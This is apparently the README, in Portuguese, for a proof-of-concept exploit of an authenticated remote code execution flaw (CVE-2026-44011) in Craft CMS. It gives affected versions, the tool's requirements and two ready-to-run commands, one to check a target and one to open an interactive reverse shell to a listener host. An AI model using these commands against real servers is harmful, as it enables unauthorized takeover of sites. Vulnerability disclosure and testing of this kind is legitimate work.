
PoC de RCE autenticado no Craft CMS para CVE-2026-44011
Este script Python adapta o ataque descrito no aviso de segurança do Craft CMS. Um usuário autenticado do Craft pode alcançar um caminho vulnerável de configuração de layout de campos e fazer com que o servidor execute comandos.
As versões afetadas são Craft CMS >=4.0.0, <4.17.12 e >=5.0.0, <5.9.18.
O script requer curl em ambos os hosts. Ele usa Bash no servidor. O Python3 no servidor também fornece um PTY interativo; sem ele, o shell recorre a uma conexão básica.
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
O Craft CMS credita @precicom-vincent-tl como o descobridor da CVE-2026-44011. Os detalhes da vulnerabilidade e o payload de exemplo estão publicados no aviso do Craft CMS GHSA-qrgm-p9w5-rrfw. Este script adapta essa técnica publicada.